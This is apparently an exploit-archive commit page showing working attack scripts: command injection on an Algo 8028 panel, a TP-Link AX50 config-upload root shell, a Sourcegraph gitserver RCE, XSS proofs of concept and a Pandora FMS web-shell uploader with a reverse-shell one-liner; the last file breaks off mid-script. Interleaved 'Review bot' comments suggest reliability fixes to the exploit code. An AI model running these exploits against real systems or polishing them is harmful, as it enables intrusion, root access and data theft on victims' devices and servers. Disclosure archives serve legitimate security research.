DB: 2022-06-15

16 changes to exploits/shellcodes

Real Player v.20.0.8.310 G2 Control - 'DoGoToURL()' Remote Code Execution (RCE)
Real Player 16.0.3.51 - 'external::Import()' Directory Traversal to Remote Code Execution (RCE)
HP LaserJet Professional M1210 MFP Series Receive Fax Service - Unquoted Service Path
Marval MSM v14.19.0.12476 - Remote Code Execution (RCE) (Authenticated)
Virtua Software Cobranca 12S - SQLi
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
phpIPAM 1.4.5 - Remote Code Execution (RCE) (Authenticated)
ChurchCRM 4.4.5 - SQLi
Old Age Home Management System 1.0 - SQLi Authentication Bypass
SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
This commit is contained in:
Offensive Security 2022-06-15 05:01:57 +00:00
parent 5012842b97
commit 29e275db94
17 changed files with 1194 additions and 0 deletions


@ -0,0 +1,81 @@
# Exploit Title: Algo 8028 Control Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:"Algo 8028 Control Panel"
# Shodan: title:"Algo 8028 Control Panel"
# Date: 2022-06-07
# Exploit Author: Filip Carlsson
# Vendor Homepage: https://www.algosolutions.com/
# Software Link: https://www.algosolutions.com/firmware-downloads/8028-firmware-selection/
# Version: 3.3.3
# Tested on: Version 3.3.3
# CVE : N/A
# Exploit:
# Due to bad sanitation in http://<IP:PORT>/control/fm-data.lua you can do command injection as root
# Request: POST
# Formdata:
# action: rename
# source: /a";echo $(id) 2>&1 > /opt/algo/web/root/cmd.txt;"
# target: /
#!/usr/bin/env python3
import sys
import requests
cookie=None
def main():
# check if provided 3 args
if len(sys.argv) != 4:
print_help()
return
else:
host = sys.argv[1]
password = sys.argv[2]
command = sys.argv[3]
if login(host, password):
# if login was successful, send command
send_command(host, command)
def print_help():
print("Usage: algo.py 192.168.1.123 password command")
print("Example: algo.py 192.168.123 algo \"cat /etc/passwd\"")
def login(host, password):
url = f"http://{host}/index.lua"
data = {"pwd": password}
res = requests.post(url, data=data)
# check if html contains "Invalid Password"
if "Invalid Password" in res.text:
print("Invalid password")
return False
else:
# save cookie
global cookie
cookie = res.cookies
print("Successfully logged in\n")
return True
def send_command(host, command):
url = f"http://{host}/control/fm-data.lua"
data = {"action": "rename", "source": f"/a\";echo $({command}) 2>&1 > /opt/algo/web/root/a.txt;\"", "target": "/"}
res = requests.post(url, data=data, cookies=cookie)
# get http://host/cmd.txt
url = f"http://{host}/a.txt"
res = requests.get(url)
# if "404 Not Found" in text then command was not executed
if "404 Not Found" in res.text:
print("Command was not executed (404)")
else:
print(res.text)
# delete cmd.txt
url = f"http://{host}/control/fm-data.lua"
data = {"action": "rename", "source": f"/a\";$(rm -rf /opt/algo/web/root/a.txt);\"", "target": "/"}
requests.post(url, data=data, cookies=cookie)
if __name__ == "__main__":
main()
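Review bot: `if "404 Not Found" in res.text:` in `send_command` tests the response body rather than the status, so a target with a custom error page, or a command whose own output happens to contain that string, is misclassified; `if res.status_code == 404:` is the reliable check. None of the `requests.post`/`requests.get` calls pass `timeout=`, so an unresponsive host blocks the script indefinitely instead of failing with an error. The cleanup POST at the end of `send_command` runs unconditionally and its response is discarded, so the script gives no indication when the temporary file it writes under the web root is left behind; a comment such as `# best-effort cleanup; result is not checked` would at least make that explicit.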

295
exploits/hardware/remote/50962.py Executable file

@ -0,0 +1,295 @@
# Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tomas Melicher
# Technical Details: https://github.com/aaronsvk/CVE-2022-30075
# Date: 2022-06-08
# Vendor Homepage: https://www.tp-link.com/
# Tested On: Tp-Link Archer AX50
# Vulnerability Description: Remote Code Execution via importing malicious config file
# CVE: CVE-2022-30075
#!/usr/bin/python3
import argparse # pip install argparse
import requests # pip install requests
import binascii, base64, os, re, json, sys, time, math, random, hashlib
import tarfile, zlib
from Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad, unpad
from Crypto.Random import get_random_bytes
from urllib.parse import urlencode
class WebClient(object):
def __init__(self, target, password):
self.target = target
self.password = password.encode('utf-8')
self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')
self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')
self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')
self.stok = ''
self.session = requests.Session()
data = self.basic_request('/login?form=auth', {'operation':'read'})
if data['success'] != True:
print('[!] unsupported router')
return
self.sign_rsa_n = int(data['data']['key'][0], 16)
self.sign_rsa_e = int(data['data']['key'][1], 16)
self.seq = data['data']['seq']
data = self.basic_request('/login?form=keys', {'operation':'read'})
self.password_rsa_n = int(data['data']['password'][0], 16)
self.password_rsa_e = int(data['data']['password'][1], 16)
self.stok = self.login()
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = cipher.decrypt(ciphertext)
plaintext = unpad(plaintext_padded, aes_block_size)
return plaintext
def rsa_encrypt(self, n, e, plaintext):
public_key = RSA.construct((n, e)).publickey()
encryptor = PKCS1_v1_5.new(public_key)
block_size = int(public_key.n.bit_length()/8) - 11
encrypted_text = ''
for i in range(0, len(plaintext), block_size):
encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()
return encrypted_text
def download_request(self, url, post_data):
res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)
filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]
if os.path.exists(filepath):
print('[!] can\'t download, file "%s" already exists' % filepath)
return
with open(filepath, 'wb') as f:
for chunk in res.iter_content(chunk_size=4096):
f.write(chunk)
return filepath
def basic_request(self, url, post_data, files_data={}):
res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)
return json.loads(res.content)
def encrypted_request(self, url, post_data):
serialized_data = urlencode(post_data)
encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))
encrypted_data = base64.b64encode(encrypted_data)
signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))
encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)
res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important
if(res.status_code != 200):
print('[!] url "%s" returned unexpected status code'%(url))
return
encrypted_data = json.loads(res.content)
encrypted_data = base64.b64decode(encrypted_data['data'])
data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)
return json.loads(data)
def login(self):
post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}
data = self.encrypted_request('/login?form=login', post_data)
if data['success'] != True:
print('[!] login failed')
return
print('[+] logged in, received token (stok): %s'%(data['data']['stok']))
return data['data']['stok']
class BackupParser(object):
def __init__(self, filepath):
self.encrypted_path = os.path.abspath(filepath)
self.decrypted_path = os.path.splitext(filepath)[0]
self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua
self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):
cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)
plaintext_padded = cipher.decrypt(ciphertext)
plaintext = unpad(plaintext_padded, aes_block_size)
return plaintext
def encrypt_config(self):
if not os.path.isdir(self.decrypted_path):
print('[!] invalid directory "%s"'%(self.decrypted_path))
return
# encrypt, compress each .xml using zlib and add them to tar archive
with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:
for filename in os.listdir(self.decrypted_path):
basename,ext = os.path.splitext(filename)
if ext == '.xml':
xml_path = '%s/%s'%(self.decrypted_path,filename)
bin_path = '%s/%s.bin'%(self.decrypted_path,basename)
with open(xml_path, 'rb') as f:
plaintext = f.read()
if len(plaintext) == 0:
f = open(bin_path, 'w')
f.close()
else:
compressed = zlib.compress(plaintext)
encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)
with open(bin_path, 'wb') as f:
f.write(encrypted)
tar.add(bin_path, os.path.basename(bin_path))
os.unlink(bin_path)
# compress tar archive using zlib and encrypt
with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:
compressed = zlib.compress(f1.read()+f2.read())
encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)
# write into final config file
with open('%s'%(self.encrypted_path), 'wb') as f:
f.write(encrypted)
os.unlink('%s/data.tar'%(self.decrypted_path))
def decrypt_config(self):
if not os.path.isfile(self.encrypted_path):
print('[!] invalid file "%s"'%(self.encrypted_path))
return
# decrypt and decompress config file
with open(self.encrypted_path, 'rb') as f:
decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())
decompressed = zlib.decompress(decrypted)
os.mkdir(self.decrypted_path)
# store decrypted data into files
with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:
f.write(decompressed[0:16])
with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:
f.write(decompressed[16:])
# untar second part of decrypted data
with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:
tar.extractall(path=self.decrypted_path)
# decrypt and decompress each .bin file from tar archive
for filename in os.listdir(self.decrypted_path):
basename,ext = os.path.splitext(filename)
if ext == '.bin':
bin_path = '%s/%s'%(self.decrypted_path,filename)
xml_path = '%s/%s.xml'%(self.decrypted_path,basename)
with open(bin_path, 'rb') as f:
ciphertext = f.read()
os.unlink(bin_path)
if len(ciphertext) == 0:
f = open(xml_path, 'w')
f.close()
continue
decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)
decompressed = zlib.decompress(decrypted)
with open(xml_path, 'wb') as f:
f.write(decompressed)
os.unlink('%s/data.tar'%(self.decrypted_path))
def modify_config(self, command):
xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)
if not os.path.isfile(xml_path):
print('[!] invalid file "%s"'%(xml_path))
return
with open(xml_path, 'r') as f:
xml_content = f.read()
# https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script
payload = '<service name="exploit">\n'
payload += '<enabled>on</enabled>\n'
payload += '<update_url>http://127.0.0.1/</update_url>\n'
payload += '<domain>x.example.org</domain>\n'
payload += '<username>X</username>\n'
payload += '<password>X</password>\n'
payload += '<ip_source>script</ip_source>\n'
payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))
payload += '<interface>internet</interface>\n' # not worked for other interfaces
payload += '<retry_interval>5</retry_interval>\n'
payload += '<retry_unit>seconds</retry_unit>\n'
payload += '<retry_times>3</retry_times>\n'
payload += '<check_interval>12</check_interval>\n'
payload += '<check_unit>hours</check_unit>\n'
payload += '<force_interval>30</force_interval>\n'
payload += '<force_unit>days</force_unit>\n'
payload += '</service>\n'
if '<service name="exploit">' in xml_content:
xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)
else:
xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)
with open(xml_path, 'w') as f:
f.write(xml_content)
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)
arg_parser.add_argument('-p', metavar='password', required=True)
arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')
arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')
arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')
args = arg_parser.parse_args()
client = WebClient(args.t, args.p)
parser = None
if not args.r:
print('[*] downloading config file ...')
filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})
if not filepath:
sys.exit(-1)
print('[*] decrypting config file "%s" ...'%(filepath))
parser = BackupParser(filepath)
parser.decrypt_config()
print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))
if not args.b and not args.r:
filepath = '%s_modified'%(parser.decrypted_path)
os.rename(parser.decrypted_path, filepath)
parser.decrypted_path = os.path.abspath(filepath)
parser.encrypted_path = '%s.bin'%(filepath)
parser.modify_config(args.c)
print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))
if not args.b:
if parser is None:
parser = BackupParser('%s.bin'%(args.r.rstrip('/')))
print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))
parser.encrypt_config()
data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})
timeout = data['data']['totaltime'] if data['success'] else 180
print('[*] uploading modified config file "%s"'%(parser.encrypted_path))
data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})
if not data['success']:
print('[!] unexpected response')
print(data)
sys.exit(-1)
print('[+] config file successfully uploaded')
print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))
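Review bot: `tar.extractall(path=self.decrypted_path)` in `decrypt_config` unpacks an archive that came from the device without any member filtering, so a member whose name is absolute or contains `..` is written outside the backup directory; `tar.extractall(path=self.decrypted_path, filter='data')` (Python 3.12, backported to the 3.8–3.11 maintenance releases) rejects such members. `encrypted_request` returns `None` on a non-200 status, and `login` then evaluates `data['success']` on it, raising `TypeError` instead of printing the intended `[!] login failed`; `if data is None or data['success'] != True:` covers both paths. The two `.replace('<','<').replace('&','&')` calls in `modify_config` are identity operations as the page renders them — presumably the file escapes to the XML entities and the page decoded them, which is worth confirming against the raw file. The `open(parser.encrypted_path,'rb')` passed inline to the `restore` request is never closed; a `with` block around that call would release it.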


@ -0,0 +1,13 @@
# Exploit Title: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting (XSS)
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29299
# Tested on: Windows
# Proof Of Concept:
http://IP_ADDRESS/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6


@ -0,0 +1,12 @@
# Exploit Title: SolarView Compact 6.00 - 'pow' Cross-Site Scripting (XSS)
# Date: 2022-05-15
# Exploit Author: Ahmed Alroky
# Author Company : AIactive
# Version: ver.6.00
# Vendor home page : https://www.contec.com/
# Authentication Required: No
# CVE : CVE-2022-29301
# Tested on: Windows
# Proof Of Concept:
http://IP_ADDRESS/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(9)%3C/script%3E%3C%22&bgcolor=green


@ -0,0 +1,86 @@
# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE)
# Date: 2022-06-10
# Exploit Author: Altelus
# Vendor Homepage: https://about.sourcegraph.com/
# Version: 3.63.3
# Tested on: Linux
# CVE : CVE-2022-23642
# Docker Container: sourcegraph/server:3.36.3
# Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service.
# This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed
# on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible
# if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3
#
# Exploitation parameters:
# - Exposed Sourcegraph gitserver
# - Existing repo on sourcegraph
import json
import argparse
import requests
def exploit(host, existing_git, cmd):
# setting sshCommand
data = {
"Repo" : existing_git,
"Args" : [
"config",
"core.sshCommand",
cmd
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# setting fake origin
data = {
"Repo" : existing_git,
"Args" : [
"remote",
"add",
"origin",
"git@lolololz:foo/bar.git"
]
}
res = requests.get(host+"/exec", json=data).text
if len(res) > 0:
print("[-] Didn't work: {}".format(res))
exit(0)
# triggering command using push
data = {
"Repo" : existing_git,
"Args" : [
"push",
"origin",
"master"
]
}
res = requests.get(host+"/exec", json=data).text
print("[*] Finished executing exploit")
parser = argparse.ArgumentParser()
parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host")
parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph")
parser.add_argument('--cmd', required=True, help="Command to run")
args = parser.parse_args()
host = args.gitserver_host
existing_git = args.existing_git
cmd = args.cmd
exploit(host, existing_git, cmd)
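Review bot: `# Version: 3.63.3` in the header contradicts the title, the `Docker Container` line and the last sentence of the description, which all say 3.36.3; it should read `# Version: 3.36.3`. Both failure branches call `exit(0)`, so a run that did nothing still reports success to the calling shell; `exit(1)` is the conventional failure status. The three `requests.get(host+"/exec", json=data)` calls pass no `timeout=`, so an unresponsive gitserver blocks indefinitely, and the response of the final `push` request is discarded, so the user never sees why that step failed when it did. `host` is used without validation, so a value lacking a scheme surfaces as a `requests.exceptions.MissingSchema` traceback rather than a usage message.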


@ -0,0 +1,46 @@
# Exploit Title: Avantune Genialcloud ProJ 10 - Cross-Site Scripting (XSS)
# Date: 2022-06-01
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.avantune.com
# Software Link: https://www.genialcloud.com - https://www.genialcloud.com/discover-genialcloud-proj - https://store.genialcloud.com
# Version: 10
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)
# CVE: CVE-2022-29296
Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject
and execute arbitrary web scripts or HTML via a crafted payload.
Request parameters affected is "msg".
PoC Request:
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1
Host: [REDACTED]
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Connection: close
Cache-Control: max-age=0
PoC Response:
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 11 May 2022 10:51:10 GMT
Connection: close
Content-Length: 8162
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><link rel="stylesheet"
...[SNIP]...
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>
...[SNIP]...
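Review bot: The response excerpt shows the reflection landing inside a JavaScript string literal (`var Msg = 'Invalid username or password';alert(...)//';`), which the description does not state; a line such as `Reflection context: JavaScript string literal inside an inline <script> block` would make clear that the remediation is context-appropriate (JS-string) output encoding of `msg`, not HTML encoding alone. `Request parameters affected is "msg".` reads better as `The affected request parameter is "msg".`. The recorded request carries a concrete `ASP.NET_SessionId` value while `Host` is redacted; redacting it the same way, or noting it is a test session, avoids it being mistaken for a live credential.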

293
exploits/php/webapps/50961.py Executable file

@ -0,0 +1,293 @@
# Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)
# Date: 05/20/2022
# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz
# Version: v7.0NG.742
# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)
# CVE: CVE-2020-5844
# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844
# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.
#!/usr/bin/env python3
# Imports
try:
import requests
except:
print(f"ERRORED: RUN: pip install requests")
exit()
import sys
import time
import urllib.parse
# Class for colors
class color:
red = '\033[91m'
gold = '\033[93m'
blue = '\033[36m'
green = '\033[92m'
no = '\033[0m'
# Print UNICORD ASCII Art
def UNICORD_ASCII():
print(rf"""
{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}
{color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no}
{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}
{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}
""")
# Print exploit help menu
def help():
print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution
Usage:
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
Options:
-t Target host and port. Provide target IP address and port.
-u Target username and password. Provide username and password to log in to Pandora FMS.
-p Target valid PHP session ID. No username or password needed. (Optional)
-s Reverse shell mode. Provide local IP address and port. (Optional)
-c Custom command mode. Provide command to execute. (Optional)
-w Web shell custom mode. Provide custom PHP file name. (Optional)
-h Show this help menu.
""")
exit()
# Pretty loading wheel
def loading(spins):
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
for _ in range(spins):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b')
# Run the exploit
def exploit(exploitMode, targetSess):
UNICORD_ASCII()
# Print initial variables
print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")
print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")
if targetSess is not None:
print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")
elif targetUser is not None:
print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")
print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")
if exploitMode == "command":
print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")
if exploitMode == "web":
print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")
if exploitMode == "shell":
print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")
print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")
print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")
loading(15)
# If a PHPSESSID is not provided, grab one with valid username and password
if targetSess is None:
try:
getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})
targetSess = getSession.cookies.get('PHPSESSID')
print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")
if "login_move" in getSession.text:
print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")
except:
print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")
exit()
# Set headers, parameters, and cookies for post request
headers = {
'Host': f'{targetIP}',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',
'Content-Length': '1289',
'Connection': 'close',
'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-User': '?1'
}
params = (
('sec', 'gsetup'),
('sec2', 'godmode/setup/file_manager')
)
cookies = {'PHPSESSID': targetSess}
# Basic PHP web shell with 'cmd' parameter
data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'
# Try to upload the PHP web shell to the server
try:
response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)
except:
print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")
exit()
statusCode=response.status_code
if statusCode == 200:
print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")
else:
print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")
exit()
loading(15)
print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")
loading(15)
# Print web shell location if in web shell mode
if exploitMode == "web":
print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")
print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")
# Run custom command on web shell if in command mode
if exploitMode == "command":
response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')
print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")
print(response.text)
# Run reverse shell command if in reverse shell mode
if exploitMode == "shell":
shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"
try:
requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)
print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")
except:
print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")
exit()
if __name__ == "__main__":
args = ['-h','-t','-u','-p','-s','-c','-w']
modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}
# Initialize starting variables
targetIP = None
targetPort = None
targetUser = None
targetPass = None
targetSess = None
command = None
localIP = None
localPort = None
webName = "unicord.php" # Default web shell file name
exploitMode = "web" # Default to web shell mode
